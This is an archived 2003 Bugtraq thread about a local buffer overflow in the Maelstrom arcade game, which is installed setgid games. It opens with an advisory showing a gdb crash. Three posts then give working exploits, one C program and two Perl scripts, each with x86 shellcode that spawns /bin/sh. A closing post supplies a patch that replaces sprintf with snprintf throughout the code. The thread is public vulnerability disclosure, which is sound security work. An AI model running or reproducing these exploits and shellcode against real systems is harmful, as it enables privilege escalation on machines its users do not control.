101923 2003-05-19 23:09 /44 rader/ Luca Ercoli <luca.ercoli@inwind.it>
Importerad: 2003-05-19 23:09 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4941>
Ärende: Maelstrom Buffer Overflow
------------------------------------------------------------
Maelstrom is an arcade game. There is a buffer overflow vulnerability
in Maelstrom which allow local attacker arbitrary code execution.
Vulnerable systems: Maelstrom 3.0.6
Maelstrom 3.0.5
Example:
[lucae@linux]$ gdb /usr/bin/Maelstrom
GNU gdb 5.2.1-2mdk (Mandrake Linux) Copyright 2002 Free Software
Foundation, Inc. GDB is free software, covered by the GNU General
Public License, and you are welcome to change it and/or distribute
copies of it under certain conditions. Type "show copying" to see
the conditions. There is absolutely no warranty for GDB. Type "show
warranty" for details. This GDB was configured as
"i586-mandrake-linux-gnu"...
(gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
(gdb) r
Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD"
x 9999'` Couldn't resolve host name for ABCDABC......ABCD
Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()
(gdb) Quit
Note: -rwxr-sr-x 1 root games 171568 19 feb
03:38 /usr/bin/Maelstrom in Linux Professional 9.0
Luca Ercoli luca.ercoli@inwind.it
(101923) /Luca Ercoli <luca.ercoli@inwind.it>/(Ombruten)
102007 2003-05-20 17:40 /102 rader/ Claes Nyberg <md0claes@mdstud.chalmers.se>
Importerad: 2003-05-20 17:40 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4948>
Kommentar till text 101923 av Luca Ercoli <luca.ercoli@inwind.it>
Ärende: Maelstrom exploit
------------------------------------------------------------
-- begin maelstromxp.c
/*
* Maelstrom exploit By CMN <cmn@darklab.org>
*
* Tested on
*
* Maelstrom v1.4.3 (GPL version 3.0.6)
* from Maelstrom-3.0.6-1.i386.rpm
*
* Maelstrom v1.4.3 (Linux version 3.0.3)
* from Gentoo port
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#define TARGET "/usr/bin/Maelstrom"
#define BUFSIZE 8179
#define NOP 0x90
#define OFFSET 100
static char linux_code[] =
"\xb9\xff\xff\xff\xff" /* movl $-1, %ecx */
"\x31\xc0" /* xorl %eax, %eax */
"\xb0\x31" /* movb $0x31, %al */
"\xcd\x80" /* int $0x80 */
"\x89\xc3" /* movl %eax, %ebx */
"\xb0\x46" /* movb $0x46, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\xb0\x32" /* movb $0x32, %al */
"\xcd\x80" /* int $0x80 */
"\x89\xc3" /* movl %eax, %ebx */
"\xb0\x47" /* movb $0x47, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xorl %edx, %edx */
"\x52" /* pushl %edx */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp, %ebx */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp, %ecx */
"\xb0\x0b" /* movb $0xb, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\x40" /* inc %eax */
"\xcd\x80"; /* int $0x80 */
int
main(int argc, char *argv[])
{
int ret = (u_long)(&ret);
u_char *target = TARGET;
u_char buf[BUFSIZE+1];
long offset = 0;
int i;
memset(buf, NOP, BUFSIZE);
buf[BUFSIZE] = '\0';
buf[0] = '2';
buf[1] = '@';
memcpy(&buf[BUFSIZE-(strlen(linux_code)+4*sizeof(ret))],
linux_code, strlen(linux_code));
while ( (i = getopt(argc, argv, "t:o:")) != -1) {
switch(i) {
case 't':
target = optarg;
case 'o':
offset = strtol(optarg, NULL, 0);
break;
default:
printf("\nUsage: %s [-t target ] [-o offset]\n\n", argv[0]);
exit(EXIT_FAILURE);
}
}
ret -= offset ? offset : OFFSET;
memcpy(&buf[BUFSIZE-(sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(2*sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(3*sizeof(ret))], &ret, sizeof(ret));
memcpy(&buf[BUFSIZE-(4*sizeof(ret))], &ret, sizeof(ret));
printf("Using address 0x%08lx\n", ret);
printf("Target is '%s'\n", target);
execlp(target, "CMN", "-server", buf, (char *)NULL);
perror("execle()");
exit(EXIT_FAILURE);
}
-- end maelstromxp.c
(102007) /Claes Nyberg <md0claes@mdstud.chalmers.se>/
102028 2003-05-20 19:14 /13 rader/ akcess . <akcss@linuxmail.org>
Importerad: 2003-05-20 19:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4952>
Ärende: Maelstrom Local Buffer Overflow Exploit
------------------------------------------------------------
Local exploit for /usr/bin/Maelstrom due to insufficient bounds
checking of the -player cmd line arg.
See attached proof-of-concept exploit.
-akcess
--
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr
Powered by Outblaze
(102028) /akcess . <akcss@linuxmail.org>/-(Ombruten)
Bilaga (application/octet-stream) i text 102029
102029 2003-05-20 19:14 /33 rader/ akcess . <akcss@linuxmail.org>
Bilagans filnamn: "maelx.pl"
Importerad: 2003-05-20 19:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4953>
Bilaga (text/plain) till text 102028
Ärende: Bilaga (maelx.pl) till: Maelstrom Local Buffer Overflow Exploit
------------------------------------------------------------
#!/usr/bin/perl -w
#
# /usr/bin/Maelstrom -player Local Buffer Overflow Exploit by akcess
#
# This code exploits the -player overflow which i discovered after
# reading the initial advisory detailing the -server overflow by
# Luca Ercoli
#
# [ akcess@linuxmail.org ] - *21/05/03*
$sc = "\x90"x1500; # write stdout "akcess wuz here..."; execve
/bin/sh; exit;
$sc .=
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x2e\x2e\x20\x0a\x68\x65\x72\x65";
$sc .=
"\x2e\x68\x75\x7a\x20\x68\x68\x73\x73\x20\x77\x68\x61\x6b\x63\x65";
$sc .=
"\x89\xe1\xb2\x18\xb0\x04\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68";
$sc .=
"\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24";
$sc .= "\xb0\x0b\xcd\x80";
$ENV{'SC'} = $sc;
$offset = "0";
$ret = 0xbffff9ee;
for ($i = 0; $i < (8177 - 4); $i++) {
$buf .= "\x90";
}
$buf .= pack('l', ($ret + $offset));
print("Using return address: 0x", sprintf('%lx',($ret +
$offset)),"\n");
exec("/usr/bin/Maelstrom -player 1\@'$buf'");
(102029) /akcess . <akcss@linuxmail.org>/-(Ombruten)
102049 2003-05-20 22:42 /28 rader/ Knud Erik Højgaard <kain@ircop.dk>
Importerad: 2003-05-20 22:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: full-disclosure@lists.netsys.com
Mottagare: Bugtraq (import) <4958>
Ärende: Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition
------------------------------------------------------------
hey, it's maelort.pl.
#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug
found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE.
# maelstrom-3.0.5 Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists ==
flooded mbox #¤%
$len = 1000;
$ret = pack("l",0xbfbffb7f);
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
for ($i = 0; $i < $len - length($shellcode); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;
exec("/usr/X11R6/bin/Maelstrom -server $cakeman");
--
kokanin
(102049) /Knud Erik Højgaard <kain@ircop.dk>/-------
102197 2003-05-21 18:54 /394 rader/ Andrew Church <achurch@achurch.org>
Importerad: 2003-05-21 18:54 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4965>
Kommentar till text 102049 av Knud Erik Højgaard <kain@ircop.dk>
Ärende: Maelstrom bugfix (was Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition)
------------------------------------------------------------
Am I the only one who thinks it odd to see so many exploits but
no fixes for the problem?
--Andrew Church
achurch@achurch.org
http://achurch.org/
---------------------------------------------------------------------------
[NOTE: this patch is just a methodical replacement of sprintf() on
fixed-size buffers with snprintf(), and includes some places, like
"%d" into a 128-byte buffer, that obviously won't overflow--but hey,
paranoia is good for you.]
diff -ur Maelstrom-3.0.6-orig/controls.cpp
Maelstrom-3.0.6/controls.cpp
--- Maelstrom-3.0.6-orig/controls.cpp 2001-03-25 03:04:28 +0900
+++ Maelstrom-3.0.6/controls.cpp 2003-05-21 11:25:53 +0900
@@ -83,7 +83,7 @@
if ( fname ) {
*fname = datafile;
}
- sprintf(datafile, "%s"DIR_SEP"%s", home, MAELSTROM_DATA);
+ snprintf(datafile, sizeof(datafile), "%s"DIR_SEP"%s", home, MAELSTROM_DATA);
if ( (data=fopen(datafile, mode)) == NULL )
return(NULL);
return(data);
diff -ur Maelstrom-3.0.6-orig/dialog.h Maelstrom-3.0.6/dialog.h
--- Maelstrom-3.0.6-orig/dialog.h 2001-07-21 00:08:10 +0900
+++ Maelstrom-3.0.6/dialog.h 2003-05-21 11:24:33 +0900
@@ -92,7 +92,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
@@ -878,7 +878,7 @@
if ( entry->text ) {
Fontserv->FreeText(entry->text);
}
- sprintf(buf, "%d", *entry->variable);
+ snprintf(buf, sizeof(buf), "%d", *entry->variable);
if ( entry->hilite ) {
clear = Fg;
diff -ur Maelstrom-3.0.6-orig/load.cpp Maelstrom-3.0.6/load.cpp
--- Maelstrom-3.0.6-orig/load.cpp 2000-02-15 11:47:39 +0900
+++ Maelstrom-3.0.6/load.cpp 2003-05-21 11:26:18 +0900
@@ -81,7 +81,7 @@
SDL_Surface *bmp, *title;
/* Open the title file -- we know its colormap is our global one */
- sprintf(file, "Images"DIR_SEP"Maelstrom_Titles#%d.bmp",
title_id);
+ snprintf(file, sizeof(file), "Images"DIR_SEP"Maelstrom_Titles#%d.bmp", title_id);
bmp = SDL_LoadBMP(path.Path(file));
if ( bmp == NULL ) {
return(NULL);
@@ -103,7 +103,7 @@
Uint16 w, h;
/* Open the cicn sprite file.. */
- sprintf(file, "Images"DIR_SEP"Maelstrom_Icon#%hd.cicn",
cicn_id);
+ snprintf(file, sizeof(file), "Images"DIR_SEP"Maelstrom_Icon#%hd.cicn", cicn_id);
if ( (cicn_src=SDL_RWFromFile(path.Path(file), "r")) == NULL ) {
error("GetCIcon(%hd): Can't open CICN %s: ",
cicn_id, path.Path(file));
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_FontServ.h
Maelstrom-3.0.6/maclib/Mac_FontServ.h
--- Maelstrom-3.0.6-orig/maclib/Mac_FontServ.h 1999-12-03 02:15:33
+0900
+++ Maelstrom-3.0.6/maclib/Mac_FontServ.h 2003-05-21 11:28:43 +0900
@@ -135,7 +135,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Resource.h Maelstrom-3.0.6/maclib/Mac_Resource.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Resource.h 1999-12-04 03:01:47
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Resource.h 2003-05-21 11:28:35 +0900
@@ -96,7 +96,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Sound.h Maelstrom-3.0.6/maclib/Mac_Sound.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Sound.h 2002-10-20 11:53:34
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Sound.h 2003-05-21 11:28:27 +0900
@@ -199,7 +199,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/Mac_Wave.h Maelstrom-3.0.6/maclib/Mac_Wave.h
--- Maelstrom-3.0.6-orig/maclib/Mac_Wave.h 2000-01-26 01:44:10
+0900
+++ Maelstrom-3.0.6/maclib/Mac_Wave.h 2003-05-21 11:28:20 +0900
@@ -108,7 +108,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
diff -ur Maelstrom-3.0.6-orig/maclib/macres.cpp Maelstrom-3.0.6/maclib/macres.cpp
--- Maelstrom-3.0.6-orig/maclib/macres.cpp 2000-01-26 01:44:20
+0900
+++ Maelstrom-3.0.6/maclib/macres.cpp 2003-05-21 11:30:01 +0900
@@ -58,8 +58,8 @@
ids[j], res->ResourceName(types[i], ids[j]));
if ( argv[2] ) {
char path[23];
- sprintf(path,"%s/%s:%hu", argv[2],
- types[i], ids[j]);
+ snprintf(path, sizeof(path), "%s/%s:%hu",
+ argv[2], types[i], ids[j]);
FILE *output;
Mac_ResData *D;
if ( (output=fopen(path, "w")) !=
NULL ) { diff -ur Maelstrom-3.0.6-orig/maclib/snd2wav.cpp
Maelstrom-3.0.6/maclib/snd2wav.cpp
--- Maelstrom-3.0.6-orig/maclib/snd2wav.cpp 2001-03-28 12:54:50
+0900
+++ Maelstrom-3.0.6/maclib/snd2wav.cpp 2003-05-21 11:29:23 +0900
@@ -82,7 +82,7 @@
continue;
}
wave.Load(snd, rate);
- sprintf(wavname, "snd_%d.wav", ids[i]);
+ snprintf(wavname, sizeof(wavname), "snd_%d.wav", ids[i]);
wave.Save(wavname);
}
delete macx;
diff -ur Maelstrom-3.0.6-orig/main.cpp Maelstrom-3.0.6/main.cpp
--- Maelstrom-3.0.6-orig/main.cpp 2002-10-20 11:53:32 +0900
+++ Maelstrom-3.0.6/main.cpp 2003-05-21 11:27:02 +0900
@@ -445,7 +445,7 @@
DrawText(xOff+309-7, yOff+240-6, text, geneva, STYLE_BOLD,
0x00, 0x00, 0x00);
}
- sprintf(text, "%d", gSoundLevel);
+ snprintf(text, sizeof(text), "%d", gSoundLevel);
DrawText(xOff+309-7, yOff+240-6, text, geneva, STYLE_BOLD,
30000>>8, 30000>>8, 0xFF);
screen->Update();
@@ -547,11 +547,11 @@
}
DrawText(xOff+5, botDiv+42+(index*18), hScores[index].name,
font, STYLE_BOLD, R,
G, B);
- sprintf(buffer, "%u", hScores[index].score);
+ snprintf(buffer, sizeof(buffer), "%u", hScores[index].score);
sw = fontserv->TextWidth(buffer, font, STYLE_BOLD);
DrawText(sRt-sw, botDiv+42+(index*18), buffer,
font, STYLE_BOLD, R,
G, B);
- sprintf(buffer, "%u", hScores[index].wave);
+ snprintf(buffer, sizeof(buffer), "%u", hScores[index].wave);
sw = fontserv->TextWidth(buffer, font, STYLE_BOLD);
DrawText(wRt-sw, botDiv+42+(index*18), buffer,
font, STYLE_BOLD, R, G, B);
@@ -560,7 +560,7 @@
DrawText(xOff+5, botDiv+46+(10*18)+3, "Last Score: ",
bigfont, STYLE_NORM, 0xFF,
0xFF, 0xFF);
- sprintf(buffer, "%d", GetScore());
+ snprintf(buffer, sizeof(buffer), "%d", GetScore());
sw = fontserv->TextWidth("Last Score: ", bigfont, STYLE_NORM);
DrawText(xOff+5+sw, botDiv+46+(index*18)+3, buffer,
bigfont, STYLE_NORM, 0xFF,
0xFF, 0xFF); diff -ur Maelstrom-3.0.6-orig/myerror.cpp
Maelstrom-3.0.6/myerror.cpp
--- Maelstrom-3.0.6-orig/myerror.cpp 1998-07-14 10:50:17 +0900
+++ Maelstrom-3.0.6/myerror.cpp 2003-05-21 11:23:33 +0900
@@ -16,7 +16,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(mesg, fmt, ap);
+ vsnprintf(mesg, sizeof(mesg), fmt, ap);
fputs(mesg, stderr);
va_end(ap);
}
@@ -27,7 +27,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(mesg, fmt, ap);
+ vsnprintf(mesg, sizeof(mesg), fmt, ap);
fputs(mesg, stdout);
va_end(ap);
}
@@ -37,7 +37,7 @@
char buffer[BUFSIZ];
if ( *msg ) {
- sprintf(buffer, "%s: %s\n", msg, strerror(errno));
+ snprintf(buffer, sizeof(buffer), "%s: %s\n", msg, strerror(errno));
error(buffer);
} else
error((char *)strerror(errno)); diff -ur
Maelstrom-3.0.6-orig/netlogic/game.cpp
Maelstrom-3.0.6/netlogic/game.cpp
--- Maelstrom-3.0.6-orig/netlogic/game.cpp 2001-07-23 11:24:03
+0900
+++ Maelstrom-3.0.6/netlogic/game.cpp 2003-05-21 11:33:19 +0900
@@ -232,7 +232,7 @@
lastDisplayed = gDisplayed;
screen->FillRect(0, 0, SCREEN_WIDTH, 12,
ourBlack);
- sprintf(caption,
+ snprintf(caption, sizeof(caption),
"You are player %d --- displaying player %d",
gOurPlayer+1, gDisplayed+1);
DrawText(SPRITES_WIDTH, 11, caption, geneva,
@@ -357,7 +357,7 @@
/* -- Erase old and draw new score */
screen->FillRect(45, gStatusLine+1,
score_width, text_height,
ourBlack);
- sprintf(numbuf, "%d", Score);
+ snprintf(numbuf, sizeof(numbuf), "%d", Score);
score_width = DrawText(45, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -380,7 +380,7 @@
if (lastWave != gWave) {
screen->FillRect(255, gStatusLine+1,
wave_width, text_height,
ourBlack);
- sprintf(numbuf, "%d", gWave);
+ snprintf(numbuf, sizeof(numbuf), "%d", gWave);
wave_width = DrawText(255, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -391,7 +391,7 @@
if (lastLives != Lives) {
screen->FillRect(319, gStatusLine+1,
lives_width, text_height,
ourBlack);
- sprintf(numbuf, "%-3.1d", Lives);
+ snprintf(numbuf, sizeof(numbuf), "%-3.1d", Lives);
lives_width = DrawText(319, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -402,7 +402,7 @@
if (lastBonus != Bonus) {
screen->FillRect(384, gStatusLine+1,
bonus_width, text_height,
ourBlack);
- sprintf(numbuf, "%-7.1d", Bonus);
+ snprintf(numbuf, sizeof(numbuf), "%-7.1d", Bonus);
bonus_width = DrawText(384, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -414,7 +414,7 @@
if (lastFrags != Frags) {
screen->FillRect(fragoff, gStatusLine+1,
frags_width, text_height,
ourBlack);
- sprintf(numbuf, "%-3.1d", Frags);
+ snprintf(numbuf, sizeof(numbuf), "%-3.1d", Frags);
frags_width = DrawText(fragoff, gStatusLine+11,
numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
@@ -747,10 +747,11 @@
for ( i=0; i<gNumPlayers; ++i ) {
char buffer[BUFSIZ], num1[12], num2[12];
- sprintf(num1, "%7.1d", final[i].Score);
- sprintf(num2, "%3.1d", final[i].Frags);
- sprintf(buffer, "Player %d: %-.7s Points, %-.3s Frags",
- final[i].Player, num1, num2);
+ snprintf(num1, sizeof(num1), "%7.1d", final[i].Score);
+ snprintf(num2, sizeof(num2), "%3.1d", final[i].Frags);
+ snprintf(buffer, sizeof(buffer),
+ "Player %d: %-.7s Points, %-.3s Frags",
+ final[i].Player, num1, num2);
DrawText(160, 380+i*newyork_height, buffer,
newyork, STYLE_NORM, 30000>>8, 30000>>8, 0xFF);
}
@@ -898,7 +899,7 @@
/* -- Draw the wave completed message */
- sprintf(numbuf, "Wave %d completed.", gWave);
+ snprintf(numbuf, sizeof(numbuf), "Wave %d completed.", gWave);
sw = fontserv->TextWidth(numbuf, geneva, STYLE_BOLD);
x = (SCREEN_WIDTH - sw) / 2;
DrawText(x, 150, numbuf, geneva, STYLE_BOLD, 0xFF, 0xFF, 0x00);
@@ -935,7 +936,7 @@
if (OurShip->GetBonusMult() != 1) {
SDL_Surface *sprite;
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
DrawText(x, 200, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
x += 75;
@@ -951,10 +952,10 @@
Delay(SOUND_DELAY);
sound->PlaySound(gFunk, 5);
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
bonus_width = DrawText(x, 200, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF,
0xFF);
- sprintf(numbuf, "%-5.1d", OurShip->GetScore());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetScore());
score_width = DrawText(xt, 220, numbuf, geneva, STYLE_BOLD,
0xFF, 0xFF, 0xFF);
screen->Update();
@@ -997,12 +998,12 @@
screen->FillRect(x, 200-text_height+2,
bonus_width, text_height,
ourBlack);
- sprintf(numbuf, "%-5.1d", OurShip->GetBonus());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetBonus());
bonus_width = DrawText(x, 200, numbuf,
geneva, STYLE_BOLD, 0xFF, 0xFF, 0xFF);
screen->FillRect(xt, 220-text_height+2,
score_width, text_height,
ourBlack);
- sprintf(numbuf, "%-5.1d", OurShip->GetScore());
+ snprintf(numbuf, sizeof(numbuf), "%-5.1d", OurShip->GetScore());
score_width = DrawText(xt, 220, numbuf,
geneva, STYLE_BOLD, 0xFF, 0xFF, 0xFF);
@@ -1015,7 +1016,7 @@
HandleEvents(10);
/* -- Draw the "next wave" message */
- sprintf(numbuf, "Prepare for Wave %d...", gWave+1);
+ snprintf(numbuf, sizeof(numbuf), "Prepare for Wave %d...", gWave+1);
sw = fontserv->TextWidth(numbuf, geneva, STYLE_BOLD);
x = (SCREEN_WIDTH - sw)/2;
DrawText(x, 259, numbuf, geneva, STYLE_BOLD, 0xFF, 0xFF,
0x00); diff -ur Maelstrom-3.0.6-orig/netlogic/netplay.cpp
Maelstrom-3.0.6/netlogic/netplay.cpp
--- Maelstrom-3.0.6-orig/netlogic/netplay.cpp 2002-10-20 13:11:52
+0900
+++ Maelstrom-3.0.6/netlogic/netplay.cpp 2003-05-21 11:31:43 +0900
@@ -670,7 +670,9 @@
strcpy(message, "Waiting for players:");
for ( i=0; i<gNumPlayers; ++i ) {
if ( ! acked[i] )
- sprintf(&message[strlen(message)], " %d", i+1);
+ snprintf(&message[strlen(message)],
+ sizeof(message)-strlen(message),
+ " %d", i+1);
}
Message(message);
@@ -725,7 +727,7 @@
/* Check the player... */
if ( (i != gOurPlayer) && (netbuf[1] == gOurPlayer) ) {
/* Print message, sleep 3 seconds absolutely */
- sprintf(message,
+ snprintf(message, sizeof(message),
"Error: Another player (%d) thinks they are player 1!\r\n", i+1);
ErrorMessage(message);
/* Suck up retransmission packets */
diff -ur Maelstrom-3.0.6-orig/netscore.cpp Maelstrom-3.0.6/netscore.cpp
--- Maelstrom-3.0.6-orig/netscore.cpp 2001-07-23 12:25:17 +0900
+++ Maelstrom-3.0.6/netscore.cpp 2003-05-21 11:27:18 +0900
@@ -59,7 +59,7 @@
/* Send the scores */
crc = get_checksum(key, KEY_LEN);
- sprintf(netbuf, SCOREFMT, crc, high.name, high.score,
high.wave);
+ snprintf(netbuf, sizeof(netbuf), SCOREFMT, crc, high.name, high.score, high.wave);
SDLNet_TCP_Send(remote, netbuf, strlen(netbuf));
n = SDLNet_TCP_Recv(remote, netbuf, 1024);
if ( n > 0 ) { diff -ur
Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.cpp
Maelstrom-3.0.6/screenlib/SDL_FrameBuf.cpp
--- Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.cpp 2001-07-23
06:03:13 +0900
+++ Maelstrom-3.0.6/screenlib/SDL_FrameBuf.cpp 2003-05-21 11:31:01 +0900
@@ -628,7 +628,7 @@
found = 0;
for ( which=0; !found; ++which ) {
- sprintf(file, "%s%d.bmp", prefix, which);
+ snprintf(file, sizeof(file), "%s%d.bmp", prefix, which);
if ( ((fp=fopen(file, "r")) == NULL) &&
((fp=fopen(file, "w")) != NULL) ) {
found = 1; diff -ur
Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.h
Maelstrom-3.0.6/screenlib/SDL_FrameBuf.h
--- Maelstrom-3.0.6-orig/screenlib/SDL_FrameBuf.h 2000-09-25
02:55:39 +0900
+++ Maelstrom-3.0.6/screenlib/SDL_FrameBuf.h 2003-05-21 11:27:41 +0900
@@ -165,7 +165,7 @@
va_list ap;
va_start(ap, fmt);
- vsprintf(errbuf, fmt, ap);
+ vsnprintf(errbuf, sizeof(errbuf), fmt, ap);
va_end(ap);
errstr = errbuf;
}
(102197) /Andrew Church <achurch@achurch.org>/(Ombruten)